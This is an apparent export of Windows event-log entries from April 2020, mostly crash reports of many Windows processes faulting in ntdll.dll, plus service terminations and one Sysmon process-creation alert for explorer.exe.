svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xf50 +Faulting application start time: 0x01d60cd5aa0f5b70 +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 20dee9e0-3b9a-4ba3-a845-f7cf0e4b830b +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:10:18.732",4,"Summary event of the report's signatures",,"""Fault bucket 1690539892258173001, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +P2: praid:App +P3: 1.20022.82.0 +P4: 5e7bebd4 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DC.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER298.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C8.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER303.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER381.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.YourPh_5337c8d467985748fcf05be6446f8b17e2757f_3be56bc0_9cb25fb1-ffd9-4db6-acf3-5baf94394339 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: a427b0c9-701d-451c-bf99-84ab7571b271 +Report Status: 268435456 +Hashed bucket: 76bad2dfd7175cc4e77601133cacf049 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:18.090",4,"Summary event of the report's signatures",,"""Fault bucket 1871217409248156477, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: YourPhoneServer.exe +P2: 1.20022.82.0 +P3: 5E7BEBD4 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH11D.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER12D.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER13E.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER14C.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AB.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: ad44a893-4aba-44d5-8418-658a0ce8b326 +Report Status: 268435456 +Hashed bucket: 0b3f12565ef2a8aa49f7e651cfc35b3d +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:17.199",9,"Windows Application error event",,"""Faulting application name: YourPhoneServer.exe, version: 1.20022.82.0, time stamp: 0x5e7bebd4 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x17f0 +Faulting application start time: 0x01d60cd5b88a8546 +Faulting application path: C:\Program Files\WindowsApps\Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe\YourPhoneServer\YourPhoneServer.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: a427b0c9-701d-451c-bf99-84ab7571b271 +Faulting package full name: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:10:15.467",4,"Summary event of the report's signatures",,"""Fault bucket 1610563783070951124, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF51A.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF625.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF655.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF67C.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6EB.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.YourPh_9b4ff627d34cddc3d612adfa4c8dcd0365bb70_95f60aa5_a9f9da01-17f8-4bf5-b80e-20a16373f3f4 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 363914b3-ebf9-4430-b333-1effce4fb50e +Report Status: 268435456 +Hashed bucket: 9899f004d8650e352659df3a420da6d4 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:13.984",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1538 +Faulting application start time: 0x01d60cd5b30e224c +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 363914b3-ebf9-4430-b333-1effce4fb50e +Faulting package full name: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:10:12.880",4,"Summary event of the report's signatures",,"""Fault bucket 1445133708988233608, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WEREAF8.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC90.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERECB0.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERECD6.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERED05.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_11cb9b8877caa9f72067315a9d734bc239156e36_fcf65235_386446a9-5128-4caf-b65c-b5fc2c961d6f + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 8bf84293-ca38-44a5-815f-fe4f9a42af3a +Report Status: 268435456 +Hashed bucket: 74de369fdf5b4d78040e2573a12fb788 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:11.278",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1324 +Faulting application start time: 0x01d60cd5ac691638 +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 8bf84293-ca38-44a5-815f-fe4f9a42af3a +Faulting package full name: Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:10:10.120",4,"Summary event of the report's signatures",,"""Fault bucket 1340614098797145948, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: taskhostw.exe +P2: 10.0.18362.387 +P3: 5fefc7f9 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE069.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE126.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE156.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE179.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1A9.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_taskhostw.exe_f03d5bcdadeaa8d94b71a3de2476f74781d7ec_77010e55_7fff375f-8305-40de-9e75-0afdb03869e5 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: a1d1d7f5-0634-4dbb-80a1-aa95f13bff47 +Report Status: 268435456 +Hashed bucket: 885ca8354b51bc10e29ad16b83af2f5c +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:09.668",4,"Summary event of the report's signatures",,"""Fault bucket 1574314897565228993, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: taskhostw.exe +P2: 10.0.18362.387 +P3: 5FEFC7F9 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTHDF69.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF79.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF8A.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFA3.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFE2.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: e565fd10-b8ba-4edf-858f-82bdcd82b8a9 +Report Status: 268435456 +Hashed bucket: 7eb09b8cb07fb8ab75d9170ee9fb1fc1 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:09.620",9,"Windows Application error event",,"""Faulting application name: taskhostw.exe, version: 10.0.18362.387, time stamp: 0x5fefc7f9 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xd48 +Faulting application start time: 0x01d60cd5a8162dfe +Faulting application path: C:\Windows\system32\taskhostw.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: a1d1d7f5-0634-4dbb-80a1-aa95f13bff47 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:53.960",4,"Summary event of the report's signatures",,"""Fault bucket 1169745795226003087, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: SecurityHealthSystray.exe +P2: 10.0.18362.628 +P3: 765bdd03 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F6.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9920.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER997F.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER99DD.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A5B.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_SecurityHealthSy_90252a4db18aef6effabc3a136419b89f51c2f7f_28e80497_bf7b39a5-4db7-49aa-8af2-68b27279abc9 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: c17805f2-5d36-4b1e-b6ba-3c9a1789f571 +Report Status: 268435456 +Hashed bucket: 545dc7a61a4342f5d03bc59a69f3e68f +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:51.558",4,"Summary event of the report's signatures",,"""Fault bucket 1837995919748689722, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: SecurityHealthSystray.exe +P2: 10.0.18362.628 +P3: 765BDD03 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH9722.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9732.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9743.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9799.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F8.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: ad316566-04ff-4b04-acbb-58a0ee47767c +Report Status: 268435456 +Hashed bucket: c340295b095a416b1981df8d073cef3a +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:50.322",5,"Windows Push Notifications User Service_3d061 terminated unexpectedly",,"""The Windows Push Notifications User Service_3d061 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:09:50.310",5,"Sync Host_3d061 terminated unexpectedly",,"""The Sync Host_3d061 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:09:50.292",5,"Connected Devices Platform User Service_3d061 terminated unexpectedly",,"""The Connected Devices Platform User Service_3d061 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 3000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:09:50.089",9,"Windows Application error event",,"""Faulting application name: SecurityHealthSystray.exe, version: 10.0.18362.628, time stamp: 0x765bdd03 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1598 +Faulting application start time: 0x01d60cd5b3aa9a13 +Faulting application path: C:\Windows\System32\SecurityHealthSystray.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: c17805f2-5d36-4b1e-b6ba-3c9a1789f571 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:49.173",4,"Summary event of the report's signatures",,"""Fault bucket 1712032597060996587, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: svchost.exe +P2: 10.0.18362.1 +P3: 32d6c210 +P4: StackHash_1e37 +P5: 0.0.0.0 +P6: 00000000 +P7: c0000005 +P8: PCH_39_FROM_unknown+0x0000000000000000 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8103.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER84EC.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER857A.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER85A5.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8633.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_svchost.exe_98a97f67fb786bddb4f2e540a9ad544d69dd3fb_a3c514cf_94055a69-e3e0-43c5-a21e-1417a7b1c986 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 220120c4-87a3-4127-9d1c-2865b5bdc4ab +Report Status: 268435456 +Hashed bucket: 465c10de1bbb5ea477c25c9387b5cdeb +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:43.192",10,"Multiple Windows error Application events",,"""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x00007ff6abb7e38d +Faulting process id: 0xcf0 +Faulting application start time: 0x01d60cd5a80a4d4d +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: unknown +Report Id: 220120c4-87a3-4127-9d1c-2865b5bdc4ab +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:41.938",12,"Sysmon - Suspicious Process - explorer.exe","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:15:49.785616700Z"",""eventRecordID"":""520"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-04-07 12:15:49.780\r\nProcessGuid: {df9fc3d3-6ef5-5e8c-0000-0010d1821a00}\r\nProcessId: 41912\r\nImage: C:\\Windows\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: explorer.exe /LOADSAVEDWINDOWS\r\nCurrentDirectory: C:\\Windows\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-6de9-5e8c-0000-0020b0500300}\r\nLogonId: 0x350B0\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452\r\nParentProcessGuid: {df9fc3d3-6ee1-5e8c-0000-001091d01500}\r\nParentProcessId: 832\r\nParentImage: C:\\Windows\\System32\\sihost.exe\r\nParentCommandLine: sihost.exe\""""},""eventdata"":{""utcTime"":""2020-04-07 12:15:49.780"",""processGuid"":""{df9fc3d3-6ef5-5e8c-0000-0010d1821a00}"",""processId"":""41912"",""image"":""C:\\\\Windows\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""explorer.exe /LOADSAVEDWINDOWS"",""currentDirectory"":""C:\\\\Windows\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-6de9-5e8c-0000-0020b0500300}"",""logonId"":""0x350b0"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452"",""parentProcessGuid"":""{df9fc3d3-6ee1-5e8c-0000-001091d01500}"",""parentProcessId"":""832"",""parentImage"":""C:\\\\Windows\\\\System32\\\\sihost.exe"",""parentCommandLine"":""sihost.exe""}}}","""Process Create: +RuleName: +UtcTime: 2020-04-07 12:15:49.780 +ProcessGuid: {df9fc3d3-6ef5-5e8c-0000-0010d1821a00} +ProcessId: 41912 +Image: C:\Windows\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: explorer.exe /LOADSAVEDWINDOWS +CurrentDirectory: C:\Windows\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-6de9-5e8c-0000-0020b0500300} +LogonId: 0x350B0 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452 +ParentProcessGuid: {df9fc3d3-6ee1-5e8c-0000-001091d01500} +ParentProcessId: 832 +ParentImage: C:\Windows\System32\sihost.exe +ParentCommandLine: sihost.exe""" +"Apr 26, 2020 @ 10:09:34.759",9,"Windows Application error event",,"""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """ +"Apr 26, 2020 @ 10:09:28.101",4,"Summary event of the report's signatures",,"""Fault bucket 1637491510777227696, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.SkypeApp_14.56.102.0_x64__kzf8qxf38zg5c +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C2A.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D64.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D94.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DAD.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DCE.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.SkypeA_7d2a408828e065e1d27872d29be5ccc5e9fa361_ca0f241c_da730706-783c-4686-b50c-8c35f0eb4b42 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: ee5d5106-dbaf-4353-a899-4a4e9a27e48e +Report Status: 268435456 +Hashed bucket: 2a13a40d9a75141906b989da6e9829b0 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:27.951",4,"Summary event of the report's signatures",,"""Fault bucket 1622308077343013045, type 5 +Event Name: BEX +Response: Not available +Cab Id: 0 + +Problem signature: +P1: OneDrive.exe +P2: 19.232.1124.10 +P3: 1482ea94 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 832e7bce +P7: 00088d30 +P8: c0000409 +P9: 0000000a +P10: + +Attached files: +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\TraceCurrent.1124.0010.etl +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\TraceArchive.1124.0010-6.etl +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\TraceArchive.1124.0010-5.etl +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\TraceArchive.1124.0010-4.etl +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\SyncEngine-2020-04-07.1211.5628.1.aodl +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B81.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3025.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3055.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER305B.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER307B.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_OneDrive.exe_5f9f888f92a070788b9455eacf35150c2a872_07f528d8_6a4c5d64-4f98-4340-a720-6b51fe3e6e42 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 435be01d-fb68-4058-bcfb-f53f9416b141 +Report Status: 268435456 +Hashed bucket: c88d0b45f49ff7ddf6839899da46f8b5 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:27.585",4,"Summary event of the report's signatures",,"""Fault bucket 1249619647368064933, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: RuntimeBroker.exe +P2: 10.0.18362.1 +P3: 4539D5A0 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH3B82.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B92.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BB2.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BB7.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BD8.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: d1c2bca4-be56-42df-bf32-230401d57409 +Report Status: 268435456 +Hashed bucket: 83ecd02fadfbabe731578a72d1b8efa5 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:26.633",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x16b8 +Faulting application start time: 0x01d60cd5b615e093 +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: ee5d5106-dbaf-4353-a899-4a4e9a27e48e +Faulting package full name: Microsoft.SkypeApp_14.56.102.0_x64__kzf8qxf38zg5c +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:09:25.382",4,"Summary event of the report's signatures",,"""Fault bucket 1628525208398105851, type 5 +Event Name: BEX +Response: Not available +Cab Id: 0 + +Problem signature: +P1: jusched.exe +P2: 2.8.241.7 +P3: 5df0d8be +P4: StackHash_2beb +P5: 0.0.0.0 +P6: 00000000 +P7: PCH_99_FROM_ntdll+0x0007232C +P8: c0000005 +P9: 00000008 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A68.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B34.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B64.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B77.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2BB7.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_jusched.exe_703a93d08f7f799457d455bc4862c84c171f42b9_f38fb822_e892e926-2853-4648-ad5b-78a63211e1a3 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 2f9d87e6-0632-4766-852f-a780ecc6d6af +Report Status: 268435456 +Hashed bucket: 752e0991a4afff7d6699af0c7a568cfb +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:25.272",4,"Summary event of the report's signatures",,"""Fault bucket 2039954016612560073, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +P2: praid:App +P3: 0.0.0.0 +P4: 5d65fb6a +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER216F.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER23A2.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2420.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER251C.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER26B3.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_a517d33c7366c0ce7a4123d7394238d757255f3_df0fc392_4b200961-6f50-4dc4-834a-444a179b5427 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: d1fd5c88-53ca-4622-b3e0-302591f2c16f +Report Status: 268435456 +Hashed bucket: 28406508ca41bd6f7c4f5f5eb652acc9 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:22.304",9,"Windows Application error event",,"""Faulting application name: jusched.exe, version: 2.8.241.7, time stamp: 0x5df0d8be +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0xabb74484 +Faulting process id: 0x16e8 +Faulting application start time: 0x01d60cd5b64f1ef2 +Faulting application path: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe +Faulting module path: unknown +Report Id: 2f9d87e6-0632-4766-852f-a780ecc6d6af +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:22.289",4,"Summary event of the report's signatures",,"""Fault bucket 2258116575438203359, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: StartMenuExperienceHost.exe +P2: 